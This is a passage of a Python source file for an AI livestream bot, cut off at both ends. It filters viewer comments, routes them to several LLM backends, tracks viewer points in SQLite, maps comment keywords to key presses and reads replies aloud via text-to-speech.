self.filter_config[\"after_must_str\"]):\n return None\n else:\n for prefix in self.filter_config[\"after_must_str\"]:\n if content.endswith(prefix):\n content = content[:-len(prefix)] # 删除匹配的结尾\n break\n\n # 全为标点符号\n if My_handle.common.is_punctuation_string(content):\n return None\n\n # 换行转为,\n content = content.replace('\\n', ',')\n\n # 语言检测\n if My_handle.common.lang_check(content, self.need_lang) is None:\n logging.warning(\"语言检测不通过,已过滤\")\n return None\n\n return content\n\n\n # 违禁处理\n def prohibitions_handle(self, content):\n \"\"\"违禁处理\n\n Args:\n content (str): 带判断的字符串内容\n\n Returns:\n bool: 是否违禁词 是True 否False\n \"\"\"\n # 含有违禁词/链接\n if My_handle.common.profanity_content(content) or My_handle.common.is_url_check(content):\n logging.warning(f\"违禁词/链接:{content}\")\n return True\n\n # 违禁词过滤\n if self.filter_config[\"badwords_path\"] != \"\":\n if My_handle.common.check_sensitive_words2(self.filter_config[\"badwords_path\"], content):\n logging.warning(f\"本地违禁词:{content}\")\n return True\n\n # 同拼音违禁词过滤\n if self.filter_config[\"bad_pinyin_path\"] != \"\":\n if My_handle.common.check_sensitive_words3(self.filter_config[\"bad_pinyin_path\"], content):\n logging.warning(f\"同音违禁词:{content}\")\n return True\n \n return False\n\n\n # 直接复读\n def reread_handle(self, data):\n \"\"\"复读处理\n\n Args:\n data (dict): 包含用户名,弹幕内容\n\n Returns:\n _type_: 寂寞\n \"\"\"\n\n user_name = data[\"user_name\"]\n content = data[\"content\"]\n\n logging.info(f\"复读内容:{content}\")\n \n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"reread\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": content\n }\n\n My_handle.audio.audio_synthesis(message)\n\n\n # LLM处理\n def llm_handle(self, chat_type, data):\n \"\"\"LLM统一处理\n\n Args:\n chat_type (str): 聊天类型\n data (str): dict,含用户名和内容\n\n Returns:\n str: LLM返回的结果\n \"\"\"\n resp_content = None\n\n if chat_type == \"chatgpt\":\n # 调用gpt接口,获取返回内容\n resp_content = 
self.chatgpt.get_gpt_resp(data[\"user_name\"], data[\"content\"])\n elif chat_type == \"claude\":\n resp_content = self.claude.get_claude_resp(data[\"content\"])\n elif chat_type == \"claude2\":\n resp_content = self.claude2.get_claude2_resp(data[\"content\"])\n elif chat_type == \"chatterbot\":\n # 生成回复\n resp_content = self.bot.get_response(data[\"content\"]).text\n elif chat_type == \"chatglm\":\n resp_content = self.chatglm.get_chatglm_resp(data[\"content\"])\n elif chat_type == \"chat_with_file\":\n resp_content = self.chat_with_file.get_model_resp(data[\"content\"])\n elif chat_type == \"text_generation_webui\":\n # 生成回复\n resp_content = self.text_generation_webui.get_text_generation_webui_resp(data[\"content\"])\n elif chat_type == \"sparkdesk\":\n # 生成回复\n resp_content = self.sparkdesk.get_sparkdesk_resp(data[\"content\"])\n elif chat_type == \"langchain_chatglm\":\n # 生成回复\n resp_content = self.langchain_chatglm.get_resp(data[\"content\"])\n elif chat_type == \"zhipu\":\n # 生成回复\n resp_content = self.zhipu.get_resp(data[\"content\"])\n elif chat_type == \"bard\":\n # 生成回复\n resp_content = self.bard_api.get_resp(data[\"content\"])\n elif chat_type == \"yiyan\":\n # 生成回复\n resp_content = self.yiyan.get_resp(data[\"content\"])\n elif chat_type == \"tongyi\":\n # 生成回复\n resp_content = self.tongyi.get_resp(data[\"content\"])\n elif chat_type == \"reread\":\n # 复读机\n resp_content = data[\"content\"]\n elif chat_type == \"none\":\n # 不启用\n pass\n else:\n resp_content = data[\"content\"]\n\n return resp_content\n\n\n # 积分处理\n def integral_handle(self, type, data):\n \"\"\"积分处理\n\n Args:\n type (str): 消息数据类型(comment/gift/entrance)\n data (dict): 平台侧传入的data数据,直接拿来做解析\n\n Returns:\n bool: 是否正常触发了积分事件,是True 否False\n \"\"\"\n user_name = data[\"username\"]\n \n if My_handle.config.get(\"integral\", \"enable\"):\n # 根据消息类型进行对应处理\n if \"comment\" == type:\n content = data[\"content\"]\n\n # 是否开启了签到功能\n if My_handle.config.get(\"integral\", \"sign\", \"enable\"):\n # 判断弹幕内容是否是命令\n if content in My_handle.config.get(\"integral\", \"sign\", \"cmd\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n # 获取文案并合成语音,传入签到天数自动检索\n def get_copywriting_and_audio_synthesis(sign_num):\n # 判断当前签到天数在哪个签到数区间内,根据不同的区间提供不同的文案回复\n for integral_sign_copywriting in My_handle.config.get(\"integral\", \"sign\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if int(integral_sign_copywriting[\"sign_num_interval\"].split(\"-\")[0]) <= \\\n sign_num <= \\\n int(integral_sign_copywriting[\"sign_num_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_sign_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"get_integral\": int(My_handle.config.get(\"integral\", \"sign\", \"get_integral\")),\n \"sign_num\": sign_num + 1\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral 
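-- uid is filled with username here because the incoming message data has no separate uid\n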
(platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n My_handle.config.get(\"integral\", \"sign\", \"get_integral\"), \n 1,\n 1,\n datetime.now(),\n 0,\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(0)\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 先判断last_sign_ts是否是今天,如果是,则说明已经打卡过了,不能重复打卡\n # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n date_string = integral_data[6]\n\n # 获取日期部分(前10个字符),并与当前日期字符串比较\n if date_string[:10] == datetime.now().date().strftime(\"%Y-%m-%d\"):\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": f\"{user_name}您今天已经签到过了,不能重复打卡哦~\"\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, view_num=?, sign_num=?, last_sign_ts=?, last_ts=? WHERE username =?\n '''\n self.db.execute(update_data_sql, (\n # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n integral_data[3] + My_handle.config.get(\"integral\", \"sign\", \"get_integral\"), \n integral_data[4] + 1,\n integral_data[5] + 1,\n datetime.now(),\n datetime.now(),\n user_name\n )\n )\n\n logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(integral_data[5] + 1)\n\n return True\n elif \"gift\" == type:\n # 是否开启了礼物功能\n if My_handle.config.get(\"integral\", \"gift\", \"enable\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n get_integral = int(float(My_handle.config.get(\"integral\", \"gift\", \"get_integral_proportion\")) * data[\"total_price\"])\n\n # 获取文案并合成语音,传入总礼物金额自动检索\n def get_copywriting_and_audio_synthesis(total_price):\n # 判断当前礼物金额在哪个礼物金额区间内,根据不同的区间提供不同的文案回复\n for integral_gift_copywriting in My_handle.config.get(\"integral\", \"gift\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if float(integral_gift_copywriting[\"gift_price_interval\"].split(\"-\")[0]) <= \\\n total_price <= \\\n float(integral_gift_copywriting[\"gift_price_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_gift_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"gift_name\": data[\"gift_name\"],\n \"get_integral\": get_integral\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n # TODO:此处有计算bug!!! 
总礼物价值计算不对,后期待优化\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral (platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n get_integral, \n 1,\n 1,\n datetime.now(),\n data[\"total_price\"],\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(data[\"total_price\"])\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, total_price=?, last_ts=? WHERE username =?\n '''\n self.db.execute(update_data_sql, (\n # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n integral_data[3] + get_integral, \n integral_data[7] + data[\"total_price\"],\n datetime.now(),\n user_name\n )\n )\n\n logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(data[\"total_price\"])\n\n return True\n elif \"entrance\" == type:\n # 是否开启了入场功能\n if My_handle.config.get(\"integral\", \"entrance\", \"enable\"):\n # 查询数据库中是否有当前用户的积分记录(缺个UID)\n common_sql = '''\n SELECT * FROM integral WHERE username =?\n '''\n integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n logging.debug(f\"integral_data={integral_data}\")\n\n # 获取文案并合成语音,传入观看天数自动检索\n def get_copywriting_and_audio_synthesis(view_num):\n # 判断当前签到天数在哪个签到数区间内,根据不同的区间提供不同的文案回复\n for integral_entrance_copywriting in My_handle.config.get(\"integral\", \"entrance\", \"copywriting\"):\n # 在此区间范围内,所以你的配置一定要对,不然这里就崩溃了!!!\n if int(integral_entrance_copywriting[\"entrance_num_interval\"].split(\"-\")[0]) <= \\\n view_num <= \\\n int(integral_entrance_copywriting[\"entrance_num_interval\"].split(\"-\")[1]):\n # 匹配文案\n resp_content = random.choice(integral_entrance_copywriting[\"copywriting\"])\n \n logging.debug(f\"resp_content={resp_content}\")\n\n data_json = {\n \"user_name\": data[\"username\"],\n \"get_integral\": int(My_handle.config.get(\"integral\", \"entrance\", \"get_integral\")),\n \"entrance_num\": view_num + 1\n } \n\n resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n \n # 生成回复内容\n message = {\n \"type\": \"direct_reply\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n if integral_data == []:\n # 积分表中没有该用户,插入数据\n insert_data_sql = '''\n INSERT INTO integral (platform, username, uid, integral, view_num, sign_num, last_sign_ts, total_price, last_ts) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data[\"platform\"], \n user_name, \n user_name, \n My_handle.config.get(\"integral\", \"entrance\", \"get_integral\"), \n 1,\n 0,\n datetime.now(),\n 0,\n datetime.now())\n )\n\n logging.info(f\"integral积分表 新增 用户:{user_name}\")\n\n get_copywriting_and_audio_synthesis(1)\n\n return True\n else:\n integral_data = integral_data[0]\n # 积分表中有该用户,更新数据\n\n # 先判断last_ts是否是今天,如果是,则说明已经观看过了,不能重复记录\n # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n date_string = integral_data[8]\n\n # 获取日期部分(前10个字符),并与当前日期字符串比较\n if date_string[:10] == datetime.now().date().strftime(\"%Y-%m-%d\"):\n return False\n\n # 更新下用户数据\n update_data_sql = '''\n UPDATE integral SET integral=?, view_num=?, last_ts=? 
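-- entrance visits update integral, view_num and last_ts only; sign_num stays as-is\n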
WHERE username =?\n                            '''\n                            self.db.execute(update_data_sql, (\n                                # 此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n                                integral_data[3] + My_handle.config.get(\"integral\", \"entrance\", \"get_integral\"), \n                                integral_data[4] + 1,\n                                datetime.now(),\n                                user_name\n                            )\n                            )\n\n                            logging.info(f\"integral积分表 更新 用户:{user_name}\")\n\n                            get_copywriting_and_audio_synthesis(integral_data[4] + 1)\n\n                            return True\n        elif \"crud\" == type:\n            content = data[\"content\"]\n            \n            # 是否开启了查询功能\n            if My_handle.config.get(\"integral\", \"crud\", \"query\", \"enable\"):\n                # 判断弹幕内容是否是命令\n                if content in My_handle.config.get(\"integral\", \"crud\", \"query\", \"cmd\"):\n                    # 查询数据库中是否有当前用户的积分记录(缺个UID)\n                    common_sql = '''\n                    SELECT * FROM integral WHERE username =?\n                    '''\n                    integral_data = self.db.fetch_all(common_sql, (user_name,))\n\n                    logging.debug(f\"integral_data={integral_data}\")\n\n                    # 获取文案并合成语音,传入积分总数自动检索\n                    def get_copywriting_and_audio_synthesis(total_integral):\n                        # 匹配文案\n                        resp_content = random.choice(My_handle.config.get(\"integral\", \"crud\", \"query\", \"copywriting\"))\n                        \n                        logging.debug(f\"resp_content={resp_content}\")\n\n                        data_json = {\n                            \"user_name\": data[\"username\"],\n                            \"integral\": total_integral\n                        }\n\n                        resp_content = self.common.dynamic_variable_replacement(resp_content, data_json)\n\n                        # 如果积分为0,则返回个没积分的回复。不过这个基本没可能,除非有bug\n                        if total_integral == 0:\n                            resp_content = data[\"username\"] + \",查询到您无积分。\"\n                        \n                        # 生成回复内容\n                        message = {\n                            \"type\": \"direct_reply\",\n                            \"tts_type\": My_handle.audio_synthesis_type,\n                            \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n                            \"config\": self.filter_config,\n                            \"user_name\": user_name,\n                            \"content\": resp_content\n                        }\n\n                        # 音频合成(edge-tts / vits_fast)并播放\n                        My_handle.audio.audio_synthesis(message)\n\n                    if integral_data == []:\n                        logging.info(f\"integral积分表 查询不到 用户:{user_name}\")\n\n                        get_copywriting_and_audio_synthesis(0)\n\n                        return True\n                    else:\n                        integral_data = integral_data[0]\n                        # 积分表中有该用户\n\n                        # 获取日期时间字符串字段,此处是个坑点,一旦数据库结构发生改变或者select语句改了,就会关联影响!!!\n                        date_string = integral_data[3]\n\n                        logging.info(f\"integral积分表 用户:{user_name},总积分:{date_string}\")\n\n                        get_copywriting_and_audio_synthesis(int(date_string))\n\n                        return True\n        return False\n\n\n    # 按键映射处理\n    def key_mapping_handle(self, data):\n        \"\"\"按键映射处理\n\n        Args:\n            data (dict): 平台侧传入的data数据,直接拿来做解析\n\n        Returns:\n            bool: 是否正常触发了按键映射事件,是True 否False\n        \"\"\"\n        # 官方文档:https://pyautogui.readthedocs.io/en/latest/keyboard.html#keyboard-keys\n        if My_handle.config.get(\"key_mapping\", \"enable\"):\n            content = data[\"content\"]\n            # 判断命令头是否匹配\n            start_cmd = My_handle.config.get(\"key_mapping\", \"start_cmd\")\n            if start_cmd != \"\" and content.startswith(start_cmd):\n                # 删除命令头部\n                content = content[len(start_cmd):]\n\n                key_mapping_configs = My_handle.config.get(\"key_mapping\", \"config\")\n\n                for key_mapping_config in key_mapping_configs:\n                    similarity = float(key_mapping_config[\"similarity\"])\n                    for keyword in key_mapping_config[\"keywords\"]:\n                        # 判断相似度\n                        ratio = difflib.SequenceMatcher(None, content, keyword).ratio()\n                        if ratio >= similarity:\n                            # 触发对应按键按下释放\n                            for key in key_mapping_config[\"keys\"]:\n                                pyautogui.keyDown(key)\n                            for key in key_mapping_config[\"keys\"]:\n                                pyautogui.keyUp(key)\n\n                            logging.info(f'【触发按键映射】关键词:{keyword} 按键:{key_mapping_config[\"keys\"]}')\n\n                            return True\n        \n        return False\n\n\n    # 弹幕处理\n    def comment_handle(self, data):\n        \"\"\"弹幕处理\n\n        Args:\n            data (dict): 包含用户名,弹幕内容\n\n        Returns:\n            _type_: 寂寞\n        \"\"\"\n\n        try:\n            user_name = data[\"username\"]\n            content = data[\"content\"]\n\n            # 记录数据库\n            if 
My_handle.config.get(\"database\", \"comment_enable\"):\n insert_data_sql = '''\n INSERT INTO danmu (username, content, ts) VALUES (?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (user_name, content, datetime.now()))\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n # 0、积分机制运转\n if self.integral_handle(\"comment\", data):\n return\n if self.integral_handle(\"crud\", data):\n return\n\n # 输出当前用户发送的弹幕消息\n logging.info(f\"[{user_name}]: {content}\")\n\n \"\"\"\n 用户名也得过滤一下,防止炸弹人\n \"\"\"\n # 用户名以及弹幕违禁判断\n if self.prohibitions_handle(user_name) or self.prohibitions_handle(content):\n return\n \n # 弹幕格式检查和特殊字符替换\n content = self.comment_check_and_replace(content)\n if content is None:\n return\n \n # 判断字符串是否全为标点符号,是的话就过滤\n if My_handle.common.is_punctuation_string(content):\n logging.debug(f\"用户:{user_name}],发送纯符号的弹幕,已过滤\")\n return\n \n # 按键映射 触发后不执行后面的其他功能\n if self.key_mapping_handle(data):\n return\n \n try:\n # 念弹幕\n if My_handle.config.get(\"read_comment\", \"enable\"):\n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"read_comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": content\n }\n\n # 判断是否需要念用户名\n if My_handle.config.get(\"read_comment\", \"read_username_enable\"):\n # 将用户名中特殊字符替换为空\n message['user_name'] = self.common.replace_special_characters(message['user_name'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\")\n tmp_content = random.choice(self.config.get(\"read_comment\", \"read_username_copywriting\"))\n if \"{username}\" in tmp_content:\n message['content'] = tmp_content.format(username=message['user_name']) + message['content']\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 1、本地问答库 处理\n if self.local_qa_handle(data):\n return\n\n # 2、点歌模式 触发后不执行后面的其他功能\n if self.choose_song_handle(data):\n return\n\n # 3、画图模式 触发后不执行后面的其他功能\n if self.sd_handle(data):\n return\n \n data_json = {\n \"user_name\": user_name,\n \"content\": content\n }\n\n \"\"\"\n 根据聊天类型执行不同逻辑\n \"\"\" \n if self.chat_type == \"chatgpt\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 ChatGPT 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatgpt无返回\")\n elif self.chat_type == \"claude\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude无返回\")\n elif self.chat_type == \"claude2\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude2无返回\")\n elif self.chat_type == \"chatterbot\":\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n elif self.chat_type == \"chatglm\":\n data_json[\"content\"] 
= self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatglm无返回\")\n elif self.chat_type == \"chat_with_file\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n print(f\"[AI回复{user_name}]:{resp_content}\")\n elif self.chat_type == \"text_generation_webui\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:text_generation_webui无返回\")\n elif self.chat_type == \"sparkdesk\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:讯飞星火无返回\")\n elif self.chat_type == \"langchain_chatglm\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:langchain_chatglm无返回\")\n elif self.chat_type == \"zhipu\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:智谱AI无返回\")\n elif self.chat_type == \"bard\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:Bard无返回,请检查配置、网络是否正确,也可能是token过期,需要清空cookie重新登录获取\")\n elif self.chat_type == \"yiyan\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:文心一言无返回,请检查配置、网络是否正确,也可能是cookie过期或失效,需要重新获取cookie\")\n elif self.chat_type == \"tongyi\":\n data_json[\"content\"] = self.before_prompt + content + self.after_prompt\n\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, data_json)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:通义千问无返回,请检查配置、网络是否正确,也可能是cookie过期或失效,需要重新获取cookie\")\n elif self.chat_type == \"game\":\n # return\n\n if My_handle.config.get(\"game\", \"enable\"):\n # 传入切分后的弹幕内容\n self.game.parse_keys_and_simulate_keys_press(content.split(), 2)\n\n return\n elif self.chat_type == \"reread\":\n # 调用LLM统一接口,获取返回内容\n resp_content = self.llm_handle(self.chat_type, 
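# in reread mode llm_handle just returns the danmaku text unchanged\n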
data_json)\n elif self.chat_type == \"none\":\n # 不启用\n return\n else:\n resp_content = content\n\n # 空数据结束\n if resp_content == \"\" or resp_content is None:\n return\n\n \"\"\"\n 双重过滤,为您保驾护航\n \"\"\"\n resp_content = resp_content.replace('\\n', '。')\n \n # LLM回复的内容进行违禁判断\n if self.prohibitions_handle(resp_content):\n return\n\n # logger.info(\"resp_content=\" + resp_content)\n\n # 将 AI 回复记录到日志文件中\n with open(self.comment_file_path, \"r+\", encoding=\"utf-8\") as f:\n tmp_content = f.read()\n # 将指针移到文件头部位置(此目的是为了让直播中读取日志文件时,可以一直让最新内容显示在顶部)\n f.seek(0, 0)\n # 不过这个实现方式,感觉有点低效\n # 设置单行最大字符数,主要目的用于接入直播弹幕显示时,弹幕过长导致的显示溢出问题\n max_length = 20\n resp_content_substrings = [resp_content[i:i + max_length] for i in range(0, len(resp_content), max_length)]\n resp_content_joined = '\\n'.join(resp_content_substrings)\n\n # 根据 弹幕日志类型进行各类日志写入\n if My_handle.config.get(\"comment_log_type\") == \"问答\":\n f.write(f\"[{user_name} 提问]:\\n{content}\\n[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"问题\":\n f.write(f\"[{user_name} 提问]:\\n{content}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"回答\":\n f.write(f\"[AI回复{user_name}]:\\n{resp_content_joined}\\n\" + tmp_content)\n\n # 音频合成时需要用到的重要数据\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 礼物处理\n def gift_handle(self, data):\n try:\n # 记录数据库\n if My_handle.config.get(\"database\", \"gift_enable\"):\n insert_data_sql = '''\n INSERT INTO gift (username, gift_name, gift_num, unit_price, total_price, ts) VALUES (?, ?, ?, ?, ?, ?)\n '''\n self.db.execute(insert_data_sql, (\n data['username'], \n data['gift_name'], \n data['num'], \n data['unit_price'], \n data['total_price'],\n datetime.now())\n )\n \n # 违禁处理\n if self.prohibitions_handle(data['username']):\n return\n \n if self.integral_handle(\"gift\", data):\n return\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n data['username'] = My_handle.common.merge_consecutive_asterisks(data['username'])\n # 删除用户名中的特殊字符\n data['username'] = My_handle.common.replace_special_characters(data['username'], \"!!@#¥$%^&*_-+/——=()()【】}|{:;<>~`\\\\\") \n\n # logging.debug(f\"[{data['username']}]: {data}\")\n \n if False == self.thanks_config[\"gift_enable\"]:\n return\n\n # 如果礼物总价低于设置的礼物感谢最低值\n if data[\"total_price\"] < self.thanks_config[\"lowest_price\"]:\n return\n\n resp_content = self.thanks_config[\"gift_copy\"].format(username=data[\"username\"], gift_name=data[\"gift_name\"])\n\n message = {\n \"type\": \"gift\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": data[\"username\"],\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n except Exception as e:\n logging.error(traceback.format_exc())\n\n\n # 入场处理\n def entrance_handle(self, data):\n try:\n # 记录数据库\n if My_handle.config.get(\"database\", \"entrance_enable\"):\n insert_data_sql = '''\n INSERT INTO entrance (username, ts) VALUES (?, ?)\n '''\n self.db.execute(insert_data_sql, (data['username'], datetime.now()))\n\n # 违禁处理\n if 
